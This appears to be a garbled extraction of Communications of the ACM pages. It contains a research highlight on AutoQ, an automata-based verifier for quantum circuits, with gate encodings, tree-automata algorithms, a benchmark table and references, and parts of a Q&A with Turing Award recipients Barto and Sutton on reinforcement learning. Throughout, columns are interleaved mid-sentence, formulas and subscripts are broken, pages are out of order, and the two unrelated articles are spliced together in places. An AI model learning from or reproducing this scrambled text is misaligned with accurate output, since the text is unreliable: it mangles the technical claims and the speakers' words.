(c) CNOT12 gate with target (d) Matrix of the CNOT12 gate.
from Equation 5 also for their symbolic handling. For in- qubit x1 and control qubit x2.
stance, consider a system with qubits x1, x 2, and its state
T = c00 · | 00⟩ + c01 · | 01⟩ + c10 · | 10⟩ + c11 · | 11⟩
(7)
When we view Tas a tree, the operation P x ( T ) essentially
1
for c00, c01, c10, c11 ∈ ℤ , four complex numbers represented
5
copies the right subtree of every x1-node to its left subtree,
in the algebraic way. The result of applying the Xgate (the and R_x ( Px ( T ) ) makes all leaves in every right subtree of
1
1
quantum version of the N OTgate) on qubit x 1(cf. Figure Px ( T) ’s x1-node zero. This would give us
2a)—denoted as X1—is ( c10, c11, c00, c01) T (cf. Equation 4). In-
1
Equipped with the operators, we can now proceed to ex- The sum consists of the following two summands:
press the semantics of X1symbolically. Let us first look at the ˲T
he summand R_xc(T )says that when the control qubit is
first two summands on the right-hand side of Equation 8: 0, the values of all qubits stay the same.
T0 = c10 · | 00⟩ + c11 · | 01⟩. These summands can be obtained ˲
The summand R xc( R_xt ( Pxt( T )) + Rxt( P_xt( T ))) handles the
by manipulating the input function Tin the following way: case when xc is 1. In such a case, we apply the X gate on
xt (observe that the inner term is the update formula of
T0 = Rx_ ( Px ( T) ). (9)
1 1 Xtin Equation 13).
JU N E 2 0 2 5 | VO L. 6 8 | N O. 6 | C OM M U N IC AT ION S OF T HE ACM 89
research highlights
plex
thatnumber:
xc and xwhen
′
c are
b
the = d = 0
gate’s , the
control quintuple
qubits (if (
a
,
they 0, c, 0, k
exist) ) and
rep- k x k x
_ {s −→ (p, q) | s −→ (p, q) ∈ ∆int ∧ k ̸= t} ∪
resents the number
the subscript 1_2 ( a +that
t to denote
√ kic)Then anytarget
xt is the complex bit number
(e.g., Gc,c can
′
).
7
x x
t
beWeapproximated
note that the arbitrarily
supported closely
set ofbygates
picking suitable
is much larger a, c,
k
{s −→ (p, q ′ ) | s −→
k
(p, q) ∈ ∆int ∧ k = t}
and k. is required to achieve (approximate) universal quantum
than
Supported quantum
computation (for which gates: We covered
it suffices to have,alle.g., standard quan-
(i) Clifford 8 else Ah := A; // when Ut = Xt
tumgates (H, supported
gates S, and CNOT) and T or
in modern (ii) Toffoli
quantum and H. ex-
computers 9 assume Ah = ⟨Qh , Σ, ∆h , R⟩;
cept Theorem
parameterized 1. The rotation symbolic update gate. formulae
From Solovay-Kitaevin Table 1 are 10 if Ut ∈ {Xt , Yt } then // need swapping
theorem, 15
gatesthe
correct (w.r.t. performing
standard semantics _2π can begates.
rotationsofbyquantum approxi- k 11 AR := ⟨Qh , Σ, ∆R , R⟩, where
mated with an error rate ϵwith 𝒪( log3.97(_Є1 )) -many gates we ∆R = {s −→
k x k
(p, q) | q −→
x
(p, q) ∈ ∆hint ∧ k ̸= t} ∪
support.
A note on expressivity. 12 k
{s −→
x k
(q, p) | s −→
x
(p, q) ∈ ∆hint ∧ k = t} ∪
Tree automata structure: We use non-deterministic tran-
The expressivity of our framework is affected by the fol- c c
sitions {s − → () ∈ ∆hleaf }
→ () | s −
lowingoffactors:
tree automata to represent a set of trees compact-
ly. Nevertheless, we can currently encode only a finite set of 13 else AR := Ah ;
1. Algebraic complex number representation (a, b, c, d, k):
states. Hence, we cannot express, for example, all quantum 14 return AR ;
This representation can arbitrarily closely approximate
states where the amplitudes
any complex number: of |10b⟩ and
when =d= |01 ⟩ are the same.
0, the quintuple
(a, 0, c, 0, k) represents the number √1 k (a + ic) Then
90
2
COMM UNICATIO NS O F THE ACM | J U NE 2025 | VO L . 68 | NO. 6
any complex number can be approximated arbitrarily 5. PERMUTATION-BASED ENCODING OF
closely by picking suitable a, c, and k. QUANTUM GATES
mulae scale the left and right subtrees of Twith scalars a0 and from Table 1—projection Pxk( T), restriction Rxk( T), multipli-
a1, respectively. The construction of the TA representing the cation, and binary operation ± —and then compose them to
result of the operation (given in Algorithm 1) can be done by get the desired gate semantics. The update formulae in Ta-
(1) making one primed copy 𝒜1of 𝒜(that is, a copy where ev- ble1 are always in the form of 𝗍𝖾𝗋𝗆1 ± 𝗍𝖾𝗋𝗆2. For example, for
ery state qis renamed to q´, with properly modified transitions the Xt gate, 𝗍𝖾𝗋𝗆1 = Rxt(P_xt( T) ) and 𝗍𝖾𝗋𝗆2 = R_xt(Pxt( T) ). Our
and root states) whose leaf labels are multiplied with a1 (Lines idea is to first construct TAs 𝒜𝗍𝖾𝗋𝗆1and 𝒜𝗍𝖾𝗋𝗆 , recognizing 2
3–5); (2) multiplying all leaf labels of 𝒜with a0(Lines 6–7); and quantum states of 𝗍𝖾𝗋𝗆1 and 𝗍𝖾𝗋𝗆2, and then combine them
x t ( p, q)to s ⟶
(3) updating all xt -labeled transitions s⟶ x t (p, q´); using binary operation ±to produce a TA recognizing the
that is, for the right child, jump to the primed version (Line quantum states of 𝗍𝖾𝗋𝗆1 ± 𝗍𝖾𝗋𝗆2. The TAs 𝒜𝗍𝖾𝗋𝗆 , 𝒜𝗍𝖾𝗋𝗆 would 1 2
7). The case of Ytis similar, but we need both constant scaling be constructed using TA versions of basic operations. We re-
(Lines 1–7) and swapping (Lines 10–12) (the left-hand side and fer the reader to the original paper11 for further details of the
right-hand side scalars being ω2and −ω2, respectively). concrete TA constructions.
primed version here (cf. 𝒜´1 at Line 4). We then update all xc the time taken by Feynman2 to check the equivalence of the
x x
-labeled transitions s ⟶ c (p, q)to s ⟶ c (p, q´), that is, jump to circuits with themselves. Although checking equivalence of
the primed version in the right subtree. quantum circuits is a harder problem than what we are solv-
ing (so the results cannot be used for direct comparison with
Theorem 4 AutoQ), we include these results in order to give an idea about
ℒ(U(𝒜)) = {U(T) | T ∈ ℒ(𝒜)}, for U ∈ {CNOTct, CZct, the hardness of the circuits for path-sum-based approaches.
Toffolic,t }. We ran this experiment on a benchmark composed of
c´
Table 2. Verification of quantum circuits. Here, n denotes the parameter value for the circuit, #q denotes the number of qubits, #G denotes
the number of gates in the circuit. For AutoQ, the columns “before” and “after” have the format “states (transitions)” denoting the number of
states and transitions in TA in the pre-condition and the output of our analysis respectively. The column “analysis” contains the time it took
AutoQ to derive the TA for the output states and = denotes the time it took Vata to test equivalence. The timeout was 12min. We use colors to
distinguish the best result in each row and timeouts.
95 96 241 193 (193) 193 (193) 6.0s 0.0s 193 (193) 193 (193) 7.1s 0.0s 0.0s equal 0.5s
96 97 243 195 (195) 195 (195) 5.9s 0.0s 195 (195) 195 (195) 7.1s 0.0s 0.0s equal 0.5s
BV 97 98 246 197 (197) 197 (197) 6.3s 0.0s 197 (197) 197 (197) 7.4s 0.0s 0.0s equal 0.6s
98 99 248 199 (199) 199 (199) 6.5s 0.0s 199 (199) 199 (199) 7.7s 0.0s 0.0s equal 0.6s
99 100 251 201 (201) 201 (201) 6.7s 0.0s 201 (201) 201 (201) 7.8s 0.0s 0.0s equal 0.6s
12 24 5,215 49 (49) 71 (71) 11s 0.0s 49 (49) 71 (71) 49s 0.0s 2.8s timeout
14 28 12,217 57 (57) 83 (83) 31s 0.0s 57 (57) 83 (83) 2m26s 0.0s 18s timeout
Grover-
16 32 28,159 65 (65) 95 (95) 1m29s 0.0s 65 (65) 95 (95) 6m59s 0.0s 1m41s timeout
Sing
18 36 63,537 73 (73) 107 (107) 4m1s 0.0s timeout 9m27s timeout
20 40 141,527 81 (81) 119 (119) 10m56s 0.0s timeout timeout timeout
8 16 15 33 (42) 104 (149) 0.0s 0.0s 33 (42) 404 (915) 2.8s 0.0s 1.6s equal 0.0s
10 20 19 41 (52) 150 (216) 0.0s 0.0s 41 (52) 1,560 (3,607) 27s 0.0s 6.1s equal 0.1s
MCToffoli 12 24 23 49 (62) 204 (295) 0.0s 0.0s 49 (62) 6,172 (14,363) 6m48s 0.1s 25s equal 0.1s
14 28 27 57 (72) 266 (386) 0.1s 0.0s timeout 1m40s equal 0.1s
16 32 31 65 (82) 336 (489) 0.2s 0.0s timeout timeout equal 0.2s
6 18 357 37 (43) 252 (315) 3.3s 0.0s 37 (43) 510 (573) 12s 0.0s 1.7s timeout
7 21 552 43 (50) 481 (608) 10s 0.0s 43 (50) 1,123 (1,250) 42s 0.0s 5.4s timeout
Grover-
8 24 939 49 (57) 934 (1,189) 39s 0.1s 49 (57) 2,472 (2,727) 2m40s 0.0s 26s timeout
All
9 27 1,492 55 (64) 1,835 (2,346) 2m17s 0.4s 55 (64) 5,421 (5,932) 10m13s 0.1s 2m5s timeout
10 30 2,433 61 (71) 3,632 (4,655) 9m48s 2.1s timeout 11m31s timeout
evaluated the ability of the tools to determine that two For such cases, AutoQ can still find bugs using a weaker
quantum circuits are non-equivalent (this is to simulate the specification. For instance, AutoQ was able to find bugs in
use case of verifying the output of an optimizer). We took some large-scale instances from RevLib with hundreds of
circuits from the benchmarks FeynmanBench, Random, qubits, where both Feynman and Qcec fail (see11 for more
and RevLib, and for each circuit, we created a copy and in- details).
jected an artificial bug (one additional randomly selected
gate at a random location). Then we ran the tools and let 8. CONCLUSION
them check circuit equivalence; for AutoQ, we let it com- We presented a foundational framework for automata-
pute two TAs representing sets of output states for both cir- based verification of quantum circuits, demonstrating its
cuits for the given set of input states and then checked their effectiveness through empirical studies. We believe apply-
language equivalence with Vata.18 ing automata to quantum verification establishes a valu-
Our strategy for finding bugs with AutoQ (we used the able bridge between quantum and classical verification
Hybrid setting) was the following: We started with a TA approaches, with the potential to adapt many classical
representing a single basis state, (that is, a TA with no top- verification techniques to quantum settings—for instance,
down nondeterminism), and gradually added more non- by replacing constant tree leaf values with symbolic vari-
deterministic transitions (in each iteration one randomly ables10 and tracking the symbolic values in a similar way as
chosen transition) into the TA, making it represent a larger in symbolic execution. This allows the verification of prop-
set of states, running the analysis for each of the TAs, until erties such as whether the probability of finding a solution
we found the bug. This proved to be a successful strategy, exceeds 90% or increases over time. We also extended the
since running the analysis with an input TA representing, model’s applicability from quantum circuit to quantum pro-
for example, all possible basis states, might be too challeng- gram verification9 based on a classical deductive program
ing (generally speaking, the larger is the TA representing verification approach.
the set of states, the slower is the analysis). Note that TAs allow representation of infinite languages,
The results we obtained show that our approach to hunt- yet we only use them for finite ones, which might seem like
ing for bugs in quantum circuits is beneficial, particularly the model is overly expressive. We, however, stick to TAs for
for larger circuits, where equivalence checkers do not scale. the following two reasons: (i) there is an existing rich tool-
References
1. Abdulla, P.A. et al. Verifying quantum 767–772.
circuits with level-synchronized tree 7. Burgholzer, L. and Wille, R. Advanced
automata. In Proc. ACM Program. equivalence checking for quantum
Lang. 9, POPL (2025). circuits. IEEE Trans. on Computer-
2. Amy, M. Towards large-scale Aided Design of Integrated Circuits
functional verification of universal and Systems 40, 9 (2020), 1810–1824.
quantum circuits. In Proceedings 15th 8. Chen, T.-F., Jiang, J.-H.R., and Hsieh,
Intern. Conf. on Quantum Physics and M.-H. Partial equivalence checking of
Logic, Selinger, P. and Chiribella, G. quantum circuits. In Proc. 2022 IEEE
(eds.), 2018), 1–21. Intern. Conf. on Quantum Computing
3. Arute, F. et al. Quantum and Engineering (2022), 594–604.
supremacy using a programmable 9. Chen, Y. et al. AutoQ 2.0: From
superconducting processor. Nature, verification of quantum circuits to
574, 7779 (Oct. 2019), 505–510. verification of quantum programs
4. Bernstein, E. and Vazirani, U.V. (technical report). (2024); https://arxiv.
Quantum complexity theory. In Proc. org/abs/2411.09121.
25th Annual ACM Symp. on Theory of 10. Chen, Y. et al. AutoQ: An automata-
Computing, ACM (1993). based quantum circuit verifier. In Proc.
5. Bouajjani, A., Jonsson, B., Nilsson, M., 35th Intern. Conf. Computer Aided
and Touili, T. Regular model checking. Verification, Springer (2023), 139–153.
In Computer Aided Verification, 12th 11. Chen, Y. et al. An automata-based
Intern. Conf., Springer Emerson, framework for verification and bug
E.A. and Sistla, A.P. (eds.), (2000), hunting in quantum circuits. Proc.
403–418. ACM Program. Lang. 7, PLDI (2023),
6. Burgholzer, L., Kueng, R., and Wille, 1218–1243.
R. Random stimuli generation for 12. Coecke, B. and Duncan, R. Interacting
This work is licensed under a Creative Commons
the verification of quantum circuits. quantum observables: categorical
Attribution International 4.0 License.
In Proc. 26th Asia and South Pacific algebra and diagrammatics. New J. of
Design Automation Conf., ACM (2021), Physics, 13, 4 (apr 2011), 043016. © 2025 Copyright held by the owner/author(s).
JU N E 2 0 2 5 | VO L. 6 8 | N O. 6 | C OM M U N IC AT ION S OF T HE ACM 93
last byte
Barto: This is the connection to and all models will be wrong, as is the
search. Trial and error is search. The that can learn from famous quote, but some of them are use-
system searches for something that ful. The word “model” suggests it might
yields a high evaluation. experience’.” be a simple thing, like a bunch of proba-
Sutton: You search, and then you as- bilities or differential equations. Really,
sociate what you found. it’s what we mean when we say “knowl-
edge.” Knowledge of the world—how
Let’s move on to temporal difference you represent and organize and learn
large language models. They’re used in collection of tools.” going to continue to happen, and I want
Reinforcement Learning from Human to be a part of that.
Feedback (RLHF). They’re used in the
runtime processes that are mistakenly Leah Hoffmann is a technology writer located in
Piermont, NY.
called “reasoning.”
Barto: On the flip side, we have always © 2025 ACM 0001-0782/25/6
JU N E 2 0 2 5 | VO L. 6 8 | N O. 6 | C OM M U N IC AT ION S OF T HE ACM 95
last byte
Q&A
Developing the Foundations
of Reinforcment Learning
2024 ACM A.M. Turing Award recipients Andrew G. Barto and Richard S. Sutton on learning from
experience, temporal difference learning, and reinforcement learning as “a collection of tools.”
THE EX A MPLES ARE nothing if not relat-
able: preparing breakfast, or playing a
game of chess or tic-tac-toe. Yet the idea
of learning from the environment and
taking steps that progress toward a goal
apparently was under-studied when
ACM A.M. Turing Award recipients An-
drew G. Barto and Richard S. Sutton
took on the topic in the late 1970s. Even-
tually, their research led to the creation
of reinforcement learning algorithms
that sought not to recognize patterns
but maximize rewards. We spoke with
Barto and Sutton about how it all un-
folded, and what’s next for the tech-
niques that are so celebrated for their
success in AlphaGo and AlphaZero. Andrew G. Barto Richard S. Sutton
PHOTOGRA PH OF ANDREW G. BARTO BY JASO N M. GROW; PHOTOGRAP H O F RICH A RD S. SUTTON BY RIC HARD MORGE N ST E I N
Let’s start with the earliest days of your sense, and we continued on that line of of Massachusetts for graduate school.
collaboration. Andy, you were a postdoc research for a long time. The insight Harry had was that machine
at a group that was founded by Michael Sutton: Michael was a key player, but learning had lost the idea of agents that
Arbib at the University of Massachusetts the person who brought us together could learn; it had become pattern rec-
Amherst, known informally as the Brain is Harry Klopf. I found his work in the ognition. He was disappointed in that,
Theory Group. Rich, you were Andy’s library at Stanford (University), and I so he got the Air Force to fund the pro-
first Ph.D. student. You were tasked with wrote him a letter and met him, and gram at the University of Massachusetts.
exploring a hypothesis that neurons he suggested I apply to the University Barto: Harry felt that the idea of ho-
behaved like hedonists—that they were meostasis, which dominated thinking
self-interested agents working to maxi- about biological systems at the time,
mize pleasure and minimize pain. “Homeostatis is was not correct. Homeostasis is keeping
Barto: It was a kind of a crazy idea, things the same, and that’s just not what
because in those days, neurons were keeping things the intelligence is about. It’s about maxi-
treated as logic gates. Our job was to see same, and that’s just mizing, it’s about improving—
if the hypothesis was worth pursuing. Sutton: It’s about optimizing.
Rich joined as a graduate student about not what intelligence Barto: Interestingly, Marvin Minsky
a year after the project started, and we is about.” made the same comment in something
had five years where I didn’t have to he wrote, that homeostatic systems are
teach, Rich was taking classes, and the really good at doing nothing.
principal investigators left us alone. So
we had the freedom to explore the his- Perhaps we should take a moment to
tory of this idea and whether it made review some [C O NTINUED O N P. 94]